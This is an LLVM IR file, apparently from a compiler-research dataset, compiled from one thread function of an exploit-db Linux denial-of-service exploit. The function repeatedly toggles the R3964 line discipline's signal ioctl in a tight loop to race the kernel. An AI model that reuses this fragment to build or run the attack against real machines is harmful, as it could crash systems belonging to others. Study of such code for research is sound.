; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_46744.c_thread_fn.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_46744.c_thread_fn.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@slave_fd = common dso_local global i32 0, align 4
@R3964_ENABLE_SIGNALS = common dso_local global i32 0, align 4
@R3964_SIG_ALL = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [26 x i8] c"R3964_ENABLE_SIGNALS: %d\0A\00", align 1
@llvm.used = appending global [1 x i8*] [i8* bitcast (i8* (i8*)* @thread_fn to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal i8* @thread_fn(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i32, align 4
  store i8* %0, i8** %2, align 8
  br label %4

4:                                                ; preds = %1, %4
  %5 = load i32, i32* @slave_fd, align 4
  %6 = load i32, i32* @R3964_ENABLE_SIGNALS, align 4
  %7 = load i32, i32* @R3964_SIG_ALL, align 4
  %8 = call i32 @ioctl(i32 %5, i32 %6, i32 %7)
  store i32 %8, i32* %3, align 4
  %9 = load i32, i32* %3, align 4
  %10 = call i32 @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str, i64 0, i64 0), i32 %9)
  %11 = load i32, i32* @slave_fd, align 4
  %12 = load i32, i32* @R3964_ENABLE_SIGNALS, align 4
  %13 = call i32 @ioctl(i32 %11, i32 %12, i32 0)
  store i32 %13, i32* %3, align 4
  %14 = load i32, i32* %3, align 4
  %15 = call i32 @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str, i64 0, i64 0), i32 %14)
  br label %4
}

declare dso_local i32 @ioctl(i32, i32, i32) #1

declare dso_local i32 @printf(i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
